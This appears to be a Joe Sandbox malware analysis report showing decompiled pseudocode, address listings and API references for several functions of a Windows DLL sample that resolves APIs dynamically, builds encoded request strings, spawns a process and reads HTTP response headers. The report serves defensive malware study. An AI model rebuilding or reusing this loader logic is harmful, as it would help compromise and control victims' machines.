					_t78 = RtlAllocateHeap( *0xd4d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0xd4d238, _t152, _v20);
						goto L26;
					}
					E00D43239(GetTickCount());
					_t82 =  *0xd4d32c; // 0x32895b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0xd4d32c; // 0x32895b0
					__imp__(_t86 + 0x40);
					_t88 =  *0xd4d32c; // 0x32895b0
					_t148 = E00D47B8D(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0xd4d238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0xd4c28c);
					_push(_t148);
					_t94 = E00D4A677();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0xd4d238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E00D47B3B( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E00D45433();
						L22:
						HeapFree( *0xd4d238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E00D49F33(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E00D4137B(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E00D48B22(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E00D47953(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E00D48B22(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                                0x00d45450
                                0x00d45450
                                0x00d45450
                                0x00d45459
                                0x00d45462
                                0x00d45464
                                0x00d45464
                                0x00d45471
                                0x00d4547c
                                0x00d4547f
                                0x00d45484
                                0x00d4548d
                                0x00d45490
                                0x00d45495
                                0x00d45498
                                0x00d4549d
                                0x00d454a0
                                0x00d454ac
                                0x00d454b9
                                0x00d454bb
                                0x00d454c1
                                0x00d454c6
                                0x00d454d1
                                0x00d454d3
                                0x00d454d6
                                0x00d454d8
                                0x00d454dd
                                0x00d454e3
                                0x00d454e8
                                0x00d454eb
                                0x00d454f0
                                0x00d454fd
                                0x00d454ff
                                0x00d45505
                                0x00d4550f
                                0x00d4550f
                                0x00d45511
                                0x00d45516
                                0x00d4551b
                                0x00d4551e
                                0x00d45523
                                0x00d45530
                                0x00d45532
                                0x00d45540
                                0x00d45540
                                0x00d45542
                                0x00d45550
                                0x00d45555
                                0x00d45557
                                0x00d4555c
                                0x00d4571d
                                0x00d45727
                                0x00d45730
                                0x00d45562
                                0x00d4556e
                                0x00d45574
                                0x00d45579
                                0x00d45711
                                0x00d4571b
                                0x00000000
                                0x00d4571b
                                0x00d45585
                                0x00d4558a
                                0x00d45593
                                0x00d455a4
                                0x00d455a8
                                0x00d455b1
                                0x00d455b7
                                0x00d455c6
                                0x00d455cd
                                0x00d455d6
                                0x00d455dc
                                0x00d45705
                                0x00d4570f
                                0x00000000
                                0x00d4570f
                                0x00d455e8
                                0x00d455ee
                                0x00d455ef
                                0x00d455f4
                                0x00d455f9
                                0x00d456fb
                                0x00d45703
                                0x00000000
                                0x00d45703
                                0x00d45602
                                0x00d45609
                                0x00d45611
                                0x00d45616
                                0x00d4561f
                                0x00d4562a
                                0x00d4562f
                                0x00d45634
                                0x00d45733
                                0x00d456e7
                                0x00d456e7
                                0x00d456ec
                                0x00d456f7
                                0x00d456f9
                                0x00000000
                                0x00d456f9
                                0x00d4563e
                                0x00d45643
                                0x00d45648
                                0x00d4564d
                                0x00d4565d
                                0x00d45660
                                0x00d45666
                                0x00d4566c
                                0x00d45672
                                0x00d45675
                                0x00d4567b
                                0x00d4567e
                                0x00d45683
                                0x00d45687
                                0x00d45687
                                0x00d45693
                                0x00d4569f
                                0x00d456a3
                                0x00d456a5
                                0x00d456aa
                                0x00d456ac
                                0x00d456b1
                                0x00d456b6
                                0x00d456c3
                                0x00d456cb
                                0x00d456ce
                                0x00d456ce
                                0x00d456aa
                                0x00000000
                                0x00d45695
                                0x00d45699
                                0x00d456d0
                                0x00d456d3
                                0x00d456dc
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d456dc
                                0x00d4569b
                                0x00000000
                                0x00d4569b
                                0x00d45693

                                APIs
                                • GetTickCount.KERNEL32 ref: 00D45464
                                • wsprintfA.USER32 ref: 00D454B4
                                • wsprintfA.USER32 ref: 00D454D1
                                • wsprintfA.USER32 ref: 00D454FD
                                • HeapFree.KERNEL32(00000000,?), ref: 00D4550F
                                • wsprintfA.USER32 ref: 00D45530
                                • HeapFree.KERNEL32(00000000,?), ref: 00D45540
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00D4556E
                                • GetTickCount.KERNEL32 ref: 00D4557F
                                • RtlEnterCriticalSection.NTDLL(03289570), ref: 00D45593
                                • RtlLeaveCriticalSection.NTDLL(03289570), ref: 00D455B1
                                  • Part of subcall function 00D47B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,00D49DA0,?,032895B0), ref: 00D47BB8
                                  • Part of subcall function 00D47B8D: lstrlen.KERNEL32(?,?,?,00D49DA0,?,032895B0), ref: 00D47BC0
                                  • Part of subcall function 00D47B8D: strcpy.NTDLL ref: 00D47BD7
                                  • Part of subcall function 00D47B8D: lstrcat.KERNEL32(00000000,?), ref: 00D47BE2
                                  • Part of subcall function 00D47B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00D49DA0,?,032895B0), ref: 00D47BFF
                                • StrTrimA.SHLWAPI(00000000,00D4C28C,?,032895B0), ref: 00D455E8
                                  • Part of subcall function 00D4A677: lstrlen.KERNEL32(03289B08,00000000,00000000,7691C740,00D49DCB,00000000), ref: 00D4A687
                                  • Part of subcall function 00D4A677: lstrlen.KERNEL32(?), ref: 00D4A68F
                                  • Part of subcall function 00D4A677: lstrcpy.KERNEL32(00000000,03289B08), ref: 00D4A6A3
                                  • Part of subcall function 00D4A677: lstrcat.KERNEL32(00000000,?), ref: 00D4A6AE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00D45609
                                • lstrcpy.KERNEL32(?,?), ref: 00D45611
                                • lstrcat.KERNEL32(?,?), ref: 00D4561F
                                • lstrcat.KERNEL32(?,00000000), ref: 00D45625
                                  • Part of subcall function 00D47B3B: lstrlen.KERNEL32(?,00000000,03289D18,00000000,00D45142,03289F3B,?,?,?,?,?,69B25F44,00000005,00D4D00C), ref: 00D47B42
                                  • Part of subcall function 00D47B3B: mbstowcs.NTDLL ref: 00D47B6B
                                  • Part of subcall function 00D47B3B: memset.NTDLL ref: 00D47B7D
                                • wcstombs.NTDLL ref: 00D456B6
                                  • Part of subcall function 00D4137B: SysAllocString.OLEAUT32(?), ref: 00D413B6
                                  • Part of subcall function 00D48B22: RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                • HeapFree.KERNEL32(00000000,?,?), ref: 00D456F7
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00D45703
                                • HeapFree.KERNEL32(00000000,?,?,032895B0), ref: 00D4570F
                                • HeapFree.KERNEL32(00000000,?), ref: 00D4571B
                                • HeapFree.KERNEL32(00000000,?), ref: 00D45727
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                • String ID: Ut
                                • API String ID: 3748877296-8415677
                                • Opcode ID: 6e6fc63c86c9a253b411ff9e0971831f88652be029ec40a7366e13f96d3755d6
                                • Instruction ID: a2c523b24e396cf74130f064c3745938554b551a94c35e97f1eaf6e270f8be2d
                                • Opcode Fuzzy Hash: 6e6fc63c86c9a253b411ff9e0971831f88652be029ec40a7366e13f96d3755d6
                                • Instruction Fuzzy Hash: 42912675900218EFCB119FA8EC88AAEBBBAEF09350F154464F404EB261DB71D951DB74
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D43485, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109librarymemoryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 73%
                                			E00D43485(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E00D44944(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E00D4A789( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0xd4d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0xd4d2a8; // 0x253a5a8
					_t18 = _t47 + 0xd4e3e6; // 0x73797325
					_t68 = E00D47912(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0xd4d2a8; // 0x253a5a8
						_t19 = _t50 + 0xd4e747; // 0x3288cef
						_t20 = _t50 + 0xd4e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E00D43179();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E00D43179();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xd4d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E00D48B22(_t70);
				goto L12;
			}


















                                0x00d4348d
                                0x00d4348d
                                0x00d4349c
                                0x00d434a3
                                0x00d434a8
                                0x00d435b5
                                0x00d435bc
                                0x00d435bc
                                0x00d434b7
                                0x00d434bf
                                0x00d434c2
                                0x00d434c7
                                0x00d434dc
                                0x00d434e2
                                0x00d434e3
                                0x00d434e6
                                0x00d434ec
                                0x00d434ef
                                0x00d434f4
                                0x00d434fc
                                0x00d43508
                                0x00d4350c
                                0x00d4359c
                                0x00d43512
                                0x00d43512
                                0x00d43517
                                0x00d4351e
                                0x00d43532
                                0x00d43536
                                0x00d43585
                                0x00d43538
                                0x00d43539
                                0x00d43540
                                0x00d43559
                                0x00d4355b
                                0x00d4355f
                                0x00d43566
                                0x00d43580
                                0x00d43568
                                0x00d43571
                                0x00d43576
                                0x00d43576
                                0x00d43566
                                0x00d43594
                                0x00d43594
                                0x00d4350c
                                0x00d435a3
                                0x00d435ac
                                0x00d435b0
                                0x00000000

                                APIs
                                  • Part of subcall function 00D44944: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00D434A1,?,00000001,?,?,00000000,00000000), ref: 00D44969
                                  • Part of subcall function 00D44944: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00D4498B
                                  • Part of subcall function 00D44944: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00D449A1
                                  • Part of subcall function 00D44944: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00D449B7
                                  • Part of subcall function 00D44944: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00D449CD
                                  • Part of subcall function 00D44944: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00D449E3
                                • memset.NTDLL ref: 00D434EF
                                  • Part of subcall function 00D47912: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00D43508,73797325), ref: 00D47923
                                  • Part of subcall function 00D47912: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00D4793D
                                • GetModuleHandleA.KERNEL32(4E52454B,03288CEF,73797325), ref: 00D43525
                                • GetProcAddress.KERNEL32(00000000), ref: 00D4352C
                                • HeapFree.KERNEL32(00000000,00000000), ref: 00D43594
                                  • Part of subcall function 00D43179: GetProcAddress.KERNEL32(36776F57,00D48BDC), ref: 00D43194
                                • CloseHandle.KERNEL32(00000000,00000001), ref: 00D43571
                                • CloseHandle.KERNEL32(?), ref: 00D43576
                                • GetLastError.KERNEL32(00000001), ref: 00D4357A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                • String ID: Ut
                                • API String ID: 3075724336-8415677
                                • Opcode ID: 7ad159ec244c4caa0dd24953d00eeb18c1f3d0fb9d0aca2be112f25ccf5d6038
                                • Instruction ID: 3670e53fcf48ab0d34a2eb5262119bc8ab906783a797ca2c3f80ad487a571c04
                                • Opcode Fuzzy Hash: 7ad159ec244c4caa0dd24953d00eeb18c1f3d0fb9d0aca2be112f25ccf5d6038
                                • Instruction Fuzzy Hash: AA311FB6900208BFDB10AFA8DC89D9EBBBCEF08354F144569E545E7221D7719E48DB70
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D48F85, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 27%
                                			E00D48F85(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0xd4d33c; // 0x3289bc0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00D49B1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xd4c18c;
				}
				_t46 = E00D47F8B(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00D41525(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xd4d2a8; // 0x253a5a8
						_t16 = _t75 + 0xd4eb08; // 0x530025
						 *0xd4d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00D49B1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xd4c190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00D41525(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00D48B22(_v20);
						} else {
							_t66 =  *0xd4d2a8; // 0x253a5a8
							_t31 = _t66 + 0xd4ec28; // 0x73006d
							 *0xd4d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00D48B22(_v12);
				}
				return _v24;
			}




























                                0x00d48f8d
                                0x00d48f93
                                0x00d48f9a
                                0x00d48fa0
                                0x00d48fa4
                                0x00d48fa8
                                0x00d48fab
                                0x00d48fb0
                                0x00d48fb5
                                0x00d48fb7
                                0x00d48fb7
                                0x00d48fc0
                                0x00d48fc5
                                0x00d48fca
                                0x00d48fd0
                                0x00d48fda
                                0x00d48fe3
                                0x00d48fea
                                0x00d49003
                                0x00d49008
                                0x00d4900d
                                0x00d49016
                                0x00d4901f
                                0x00d49030
                                0x00d49039
                                0x00d4903d
                                0x00d49041
                                0x00d49046
                                0x00d4904b
                                0x00d4904d
                                0x00d4904d
                                0x00d49057
                                0x00d49060
                                0x00d49067
                                0x00d4907f
                                0x00d49083
                                0x00d490c0
                                0x00d49085
                                0x00d49088
                                0x00d49090
                                0x00d490a1
                                0x00d490ad
                                0x00d490b5
                                0x00d490b9
                                0x00d490b9
                                0x00d49083
                                0x00d490c8
                                0x00d490cd
                                0x00d490d4

                                APIs
                                • GetTickCount.KERNEL32 ref: 00D48F9A
                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 00D48FDA
                                • lstrlen.KERNEL32(00000000), ref: 00D48FE3
                                • lstrlen.KERNEL32(00000000), ref: 00D48FEA
                                • lstrlenW.KERNEL32(80000002), ref: 00D48FF7
                                • lstrlen.KERNEL32(?,00000004), ref: 00D49057
                                • lstrlen.KERNEL32(?), ref: 00D49060
                                • lstrlen.KERNEL32(?), ref: 00D49067
                                • lstrlenW.KERNEL32(?), ref: 00D4906E
                                  • Part of subcall function 00D48B22: RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: lstrlen$CountFreeHeapTick
                                • String ID:
                                • API String ID: 2535036572-0
                                • Opcode ID: af918b54a522d325ca1caec884df5ea278f13ae27d51631afa2664f81d065419
                                • Instruction ID: 2aa29ccedb6b51264cf2746b02bd76064d17836c5bc896bf9395729139709fa1
                                • Opcode Fuzzy Hash: af918b54a522d325ca1caec884df5ea278f13ae27d51631afa2664f81d065419
                                • Instruction Fuzzy Hash: 9E413576900219FBCF22AFA4CC499DEBBB5EF48354F054050F904A7221DB36DA65EBB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D457DD, Relevance: 10.6, APIs: 7, Instructions: 92networksynchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00D457DD(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E00D41525(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E00D48B22(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E00D429C0( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














                                0x00d457dd
                                0x00d457dd
                                0x00d457ed
                                0x00d457f0
                                0x00d457f4
                                0x00d457fa
                                0x00d457ff
                                0x00d45818
                                0x00d4582c
                                0x00d45833
                                0x00d4583a
                                0x00d4588d
                                0x00d45893
                                0x00d45899
                                0x00d458d4
                                0x00d458da
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d45899
                                0x00d45840
                                0x00000000
                                0x00d45847
                                0x00d45855
                                0x00d45858
                                0x00d4585b
                                0x00d45867
                                0x00d4586b
                                0x00d458cd
                                0x00d4586d
                                0x00d4587f
                                0x00d458bd
                                0x00d458c8
                                0x00d45881
                                0x00d45884
                                0x00d45888
                                0x00d45888
                                0x00d4587f
                                0x00000000
                                0x00d4586b
                                0x00d45840
                                0x00d45804
                                0x00d4580a
                                0x00d4580d
                                0x00d45812
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d458a2
                                0x00d458aa
                                0x00d458af
                                0x00d458b2
                                0x00000000

                                APIs
                                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 00D457F4
                                • SetEvent.KERNEL32(?), ref: 00D45804
                                • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 00D45836
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 00D4585B
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 00D4587B
                                • GetLastError.KERNEL32 ref: 00D4588D
                                  • Part of subcall function 00D429C0: WaitForMultipleObjects.KERNEL32(00000002,00D4A923,00000000,00D4A923,?,?,?,00D4A923,0000EA60), ref: 00D429DB
                                  • Part of subcall function 00D48B22: RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                • GetLastError.KERNEL32(00000000), ref: 00D458C2
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                • String ID:
                                • API String ID: 3369646462-0
                                • Opcode ID: 661c28472e4cf4c91169dd7e93d0a63d951bb42860c8d75b0cc84b91cb6572c1
                                • Instruction ID: fc8f8fb783425a56a38610049dacaf2f762b271ba608f6b665ded2dd9b1991a5
                                • Opcode Fuzzy Hash: 661c28472e4cf4c91169dd7e93d0a63d951bb42860c8d75b0cc84b91cb6572c1
                                • Instruction Fuzzy Hash: F2314EB5D00748EFDB20DFA5D88499EB7F8EB08300F14496AE542E2256DB709A489F70
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D47B8D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 63%
                                			E00D47B8D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xd4d2a8; // 0x253a5a8
				_t1 = _t9 + 0xd4e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E00D4A055(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E00D41525(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E00D41188(_t34, _t41, _a8);
						E00D48B22(_t41);
						_t42 = E00D4976F(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00D48B22(_t36);
							_t36 = _t42;
						}
						_t43 = E00D4A41C(_t36, _t33);
						if(_t43 != 0) {
							E00D48B22(_t36);
							_t36 = _t43;
						}
					}
					E00D48B22(_t28);
				}
				return _t36;
			}














                                0x00d47b8d
                                0x00d47b90
                                0x00d47b91
                                0x00d47b99
                                0x00d47ba0
                                0x00d47ba7
                                0x00d47bab
                                0x00d47bb1
                                0x00d47bb8
                                0x00d47bbd
                                0x00d47bcf
                                0x00d47bd3
                                0x00d47bd7
                                0x00d47bdd
                                0x00d47be2
                                0x00d47bf2
                                0x00d47bf4
                                0x00d47c0b
                                0x00d47c0f
                                0x00d47c12
                                0x00d47c17
                                0x00d47c17
                                0x00d47c20
                                0x00d47c24
                                0x00d47c27
                                0x00d47c2c
                                0x00d47c2c
                                0x00d47c24
                                0x00d47c2f
                                0x00d47c2f
                                0x00d47c3a

                                APIs
                                  • Part of subcall function 00D4A055: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,00D47BA7,253D7325,00000000,00000000,7691C740,?,?,00D49DA0,?), ref: 00D4A0BC
                                  • Part of subcall function 00D4A055: sprintf.NTDLL ref: 00D4A0DD
                                • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,00D49DA0,?,032895B0), ref: 00D47BB8
                                • lstrlen.KERNEL32(?,?,?,00D49DA0,?,032895B0), ref: 00D47BC0
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • strcpy.NTDLL ref: 00D47BD7
                                • lstrcat.KERNEL32(00000000,?), ref: 00D47BE2
                                  • Part of subcall function 00D41188: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00D47BF1,00000000,?,?,?,00D49DA0,?,032895B0), ref: 00D4119F
                                  • Part of subcall function 00D48B22: RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00D49DA0,?,032895B0), ref: 00D47BFF
                                  • Part of subcall function 00D4976F: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00D47C0B,00000000,?,?,00D49DA0,?,032895B0), ref: 00D49779
                                  • Part of subcall function 00D4976F: _snprintf.NTDLL ref: 00D497D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
